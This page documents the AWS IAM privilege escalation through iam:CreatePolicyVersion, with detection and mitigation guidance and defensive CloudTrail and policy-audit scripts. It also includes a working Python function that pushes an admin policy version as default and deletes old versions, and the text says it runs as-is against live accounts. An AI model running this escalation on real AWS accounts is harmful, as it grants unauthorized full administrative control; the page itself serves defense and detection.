
Create IAM Policy Version

critical

Privilege Escalation

An attacker with iam:CreatePolicyVersion on a customer managed policy attached to a principal they control can create a new version of that policy granting full administrative permissions and make it the default version in the same call.

Required Permissions

iam:CreatePolicyVersion

Description

This technique abuses the iam:CreatePolicyVersion permission to add a new version to an existing customer managed policy whose document grants full administrative access. Only customer managed policies are affected: AWS managed policies are read-only and cannot be versioned by the account.

When a principal has iam:CreatePolicyVersion with a Resource that covers a policy attached to their own user, to a group they belong to, or to a role they can assume, they can create a new policy version with any permissions they want, including a document equivalent to the AWS managed AdministratorAccess policy ("Effect": "Allow", "Action": "*", "Resource": "*"). The CreatePolicyVersion API accepts a SetAsDefault parameter, so the new version becomes the active one without a separate iam:SetDefaultPolicyVersion permission.

This is one of the most direct privilege escalation paths in AWS because it requires only a single permission and takes effect immediately. The one practical constraint is that a customer managed policy can hold at most five versions; if the target policy already has five, the attacker must also hold iam:DeletePolicyVersion to remove an older non-default version before the new one can be created.
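The escalation described above, written as an added example that is not part of the original page. The IAM calls use the method names and parameters of boto3's IAM client (list_policy_versions, delete_policy_version, create_policy_version) and the client is passed in, so the same function can be pointed at a real client or at the constructed in-memory FakeIamClient below; the policy ARN and account ID are placeholders. It also handles the five-version limit by deleting the oldest non-default version first, which needs iam:DeletePolicyVersion in addition.

```python
"""Create an admin version of a customer managed policy and make it the default.

Added example, not the page's own code. IAM calls mirror boto3's iam client
methods; FakeIamClient is a constructed stand-in so the logic runs offline.
"""
import json

# Document equivalent to the AWS managed AdministratorAccess policy.
ADMIN_POLICY_DOCUMENT = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

MAX_POLICY_VERSIONS = 5  # IAM hard limit per customer managed policy


def escalate_via_policy_version(iam, policy_arn):
    """Add a new default version of policy_arn that grants full admin.

    If the policy already holds five versions, the oldest non-default one is
    deleted first (requires iam:DeletePolicyVersion). Returns the new VersionId.
    """
    versions = iam.list_policy_versions(PolicyArn=policy_arn)["Versions"]
    if len(versions) >= MAX_POLICY_VERSIONS:
        # The default version cannot be deleted; drop the oldest non-default one.
        deletable = [v for v in versions if not v["IsDefaultVersion"]]
        oldest = min(deletable, key=lambda v: v["CreateDate"])
        iam.delete_policy_version(PolicyArn=policy_arn, VersionId=oldest["VersionId"])
    resp = iam.create_policy_version(
        PolicyArn=policy_arn,
        PolicyDocument=json.dumps(ADMIN_POLICY_DOCUMENT),
        SetAsDefault=True,  # active immediately for every attached principal
    )
    return resp["PolicyVersion"]["VersionId"]


class FakeIamClient:
    """Constructed in-memory stand-in for the boto3 IAM client (test double)."""

    def __init__(self, existing_versions):
        # Each entry: {"VersionId", "IsDefaultVersion", "CreateDate"}
        self.versions = [dict(v) for v in existing_versions]
        self.deleted = []
        self.documents = {}

    def list_policy_versions(self, PolicyArn):
        return {"Versions": [dict(v) for v in self.versions]}

    def delete_policy_version(self, PolicyArn, VersionId):
        self.deleted.append(VersionId)
        self.versions = [v for v in self.versions if v["VersionId"] != VersionId]

    def create_policy_version(self, PolicyArn, PolicyDocument, SetAsDefault):
        next_id = "v%d" % (1 + max(int(v["VersionId"][1:]) for v in self.versions))
        if SetAsDefault:
            for v in self.versions:
                v["IsDefaultVersion"] = False
        self.versions.append(
            {"VersionId": next_id, "IsDefaultVersion": SetAsDefault, "CreateDate": 9999}
        )
        self.documents[next_id] = json.loads(PolicyDocument)
        return {"PolicyVersion": {"VersionId": next_id, "IsDefaultVersion": SetAsDefault}}


def demo():
    """Run the escalation against a constructed policy already at five versions."""
    fake = FakeIamClient([
        {"VersionId": "v1", "IsDefaultVersion": False, "CreateDate": 1},
        {"VersionId": "v2", "IsDefaultVersion": False, "CreateDate": 2},
        {"VersionId": "v3", "IsDefaultVersion": True, "CreateDate": 3},
        {"VersionId": "v4", "IsDefaultVersion": False, "CreateDate": 4},
        {"VersionId": "v5", "IsDefaultVersion": False, "CreateDate": 5},
    ])
    # Placeholder ARN (assumption).
    new_id = escalate_via_policy_version(fake, "arn:aws:iam::123456789012:policy/dev-policy")
    return new_id, fake


if __name__ == "__main__":
    vid, client = demo()
    print("new default version:", vid, "deleted:", client.deleted)
```

Against a live account the same function is called with `boto3.client("iam")` in place of the fake; the only difference in a real run is that the CreateDate values are datetimes rather than integers, which min() orders just as well.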

Impact

Full administrative access to the AWS account. The attacker can modify any resource, create new users, and access all data. Because the change is made to the policy rather than to the attacker's principal, every user, group and role the policy is attached to receives the same permissions at once.

Detection

Monitor CloudTrail for iam.amazonaws.com events named CreatePolicyVersion, especially those whose requestParameters.setAsDefault is true. The submitted document is recorded as a JSON string in requestParameters.policyDocument; alert when it contains an Allow statement with Action "*" (or "iam:*", or a NotAction that does not exclude IAM) on Resource "*". Failed calls (errorCode AccessDenied) are worth a lower-severity alert as a sign of probing. Changes to the default version also appear as SetDefaultPolicyVersion events and should be monitored alongside.
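The detection logic above, run over a few constructed CloudTrail records, as an added example that is not part of the original page. The record layout assumed here is CloudTrail's for IAM calls: eventSource, eventName, userIdentity.arn, optional errorCode, and requestParameters carrying policyArn, setAsDefault and policyDocument as a JSON string; the ARNs and account ID are placeholders.

```python
"""Flag CreatePolicyVersion records that push an over-privileged default.

Added example, not the page's own code. Sample records are constructed to
match the CloudTrail field names for IAM events (an assumption stated above).
"""
import json


def _as_list(value):
    """IAM accepts a string or a list for Action/Resource; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def statement_is_admin(stmt):
    """True for an Allow statement granting * or iam:* on every resource.

    A NotAction that does not carve out IAM grants IAM as well, so it counts.
    """
    if stmt.get("Effect") != "Allow":
        return False
    if "*" not in set(_as_list(stmt.get("Resource"))):
        return False
    actions = {a.lower() for a in _as_list(stmt.get("Action"))}
    if "*" in actions or "iam:*" in actions:
        return True
    if "NotAction" in stmt:
        excluded = [a.lower() for a in _as_list(stmt["NotAction"])]
        return not any(a == "*" or a.startswith("iam:") for a in excluded)
    return False


def classify_event(record):
    """Return a finding for a risky CreatePolicyVersion record, else None."""
    if record.get("eventSource") != "iam.amazonaws.com":
        return None
    if record.get("eventName") != "CreatePolicyVersion":
        return None
    params = record.get("requestParameters") or {}
    set_as_default = bool(params.get("setAsDefault", False))
    try:
        doc = json.loads(params.get("policyDocument") or "{}")
    except ValueError:
        doc = {}
    admin = any(statement_is_admin(s) for s in _as_list(doc.get("Statement")))
    if not (set_as_default or admin):
        return None
    succeeded = "errorCode" not in record
    if set_as_default and admin and succeeded:
        severity = "critical"
    elif admin or not succeeded:
        severity = "medium"
    else:
        severity = "low"
    return {
        "severity": severity,
        "policyArn": params.get("policyArn"),
        "setAsDefault": set_as_default,
        "adminDocument": admin,
        "succeeded": succeeded,
        "principal": (record.get("userIdentity") or {}).get("arn"),
    }


def scan(records):
    """Apply classify_event to every record and keep the findings, in order."""
    return [f for f in (classify_event(r) for r in records) if f]


# Constructed sample records (not real CloudTrail output).
SAMPLE_RECORDS = [
    {   # benign: scoped document, not made default
        "eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"},
        "requestParameters": {
            "policyArn": "arn:aws:iam::123456789012:policy/s3-read",
            "setAsDefault": False,
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": ["s3:GetObject"],
                 "Resource": "arn:aws:s3:::reports/*"}]}),
        },
    },
    {   # the escalation: admin document set as default
        "eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/mallory"},
        "requestParameters": {
            "policyArn": "arn:aws:iam::123456789012:policy/dev-policy",
            "setAsDefault": True,
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": "*", "Resource": "*"}]}),
        },
    },
    {   # staged: iam:* document added but not yet default
        "eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/mallory"},
        "requestParameters": {
            "policyArn": "arn:aws:iam::123456789012:policy/dev-policy",
            "setAsDefault": False,
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": ["iam:*"], "Resource": "*"}]}),
        },
    },
    {   # unrelated service event
        "eventSource": "s3.amazonaws.com", "eventName": "PutObject",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/alice"},
        "requestParameters": {"bucketName": "reports"},
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

A version created without setAsDefault is still reported (at medium), since the same attacker can activate it later with SetDefaultPolicyVersion; correlating the two event names on the same policyArn closes that gap.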

Mitigation

Avoid granting iam:CreatePolicyVersion unless absolutely necessary, and when it is needed scope its Resource to the specific policy ARNs the principal should manage rather than "*". Use SCPs to deny iam:CreatePolicyVersion (and the companion iam:SetDefaultPolicyVersion) for everything except a designated break-glass role. Apply permission boundaries to cap the maximum effective permissions, keeping in mind that a boundary only holds if the boundary policy itself is not one the principal can create versions of. Periodically audit all customer managed and inline policies for Allow statements that match iam:CreatePolicyVersion, including wildcards such as iam:* and NotAction statements that do not exclude IAM.
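An audit for over-broad grants of iam:CreatePolicyVersion together with the SCP shape described above, as an added example that is not part of the original page. The policy documents are constructed, and the break-glass role ARN is a placeholder; IAM action matching is case-insensitive with * and ? wildcards, which fnmatch reproduces for these names.

```python
"""Find policy documents that grant iam:CreatePolicyVersion, and build the SCP
that denies it outside a break-glass role.

Added example, not the page's own code. Documents below are constructed.
"""
import fnmatch

TARGET_ACTION = "iam:createpolicyversion"


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching: case-insensitive, * and ? wildcards."""
    return fnmatch.fnmatchcase(action, pattern.lower())


def statement_grants_target(stmt):
    """True if an Allow statement grants iam:CreatePolicyVersion via Action
    (including wildcards) or via a NotAction that does not exclude it."""
    if stmt.get("Effect") != "Allow":
        return False
    if "Action" in stmt:
        return any(_matches(a, TARGET_ACTION) for a in _as_list(stmt["Action"]))
    if "NotAction" in stmt:
        return not any(_matches(a, TARGET_ACTION) for a in _as_list(stmt["NotAction"]))
    return False


def create_policy_version_grants(policies):
    """Return [(policy_name, resources)] for each granting statement.

    policies: dict of policy name -> parsed policy document.
    A Resource of "*" reaches every customer managed policy in the account,
    including those attached to the grantee itself.
    """
    findings = []
    for name, doc in policies.items():
        for stmt in _as_list(doc.get("Statement")):
            if statement_grants_target(stmt):
                findings.append((name, _as_list(stmt.get("Resource"))))
    return findings


def deny_policy_version_scp(break_glass_role_arn):
    """SCP denying CreatePolicyVersion and SetDefaultPolicyVersion for every
    principal except the named break-glass role."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyPolicyVersionChanges",
            "Effect": "Deny",
            "Action": ["iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion"],
            "Resource": "*",
            "Condition": {"ArnNotLike": {"aws:PrincipalArn": break_glass_role_arn}},
        }],
    }


# Constructed sample documents.
SAMPLE_POLICIES = {
    "developer": {"Statement": [
        {"Effect": "Allow", "Action": ["iam:CreatePolicyVersion", "iam:ListPolicies"],
         "Resource": "*"}]},
    "policy-admin": {"Statement": [
        {"Effect": "Allow", "Action": "iam:*",
         "Resource": "arn:aws:iam::123456789012:policy/team-*"}]},
    "readonly": {"Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"}]},
    "explicit-deny": {"Statement": [
        {"Effect": "Deny", "Action": "iam:CreatePolicyVersion", "Resource": "*"}]},
    "everything-but-s3": {"Statement": [
        {"Effect": "Allow", "NotAction": ["s3:*"], "Resource": "*"}]},
}

if __name__ == "__main__":
    for name, resources in create_policy_version_grants(SAMPLE_POLICIES):
        print(name, "->", resources)
    # Placeholder ARN (assumption).
    print(deny_policy_version_scp("arn:aws:iam::*:role/PolicyAdminBreakGlass"))
```

Of the sample policies, "policy-admin" is the acceptable shape (scoped to a policy-name prefix); "developer" and "everything-but-s3" are the ones to fix, since with Resource "*" they can version any policy in the account.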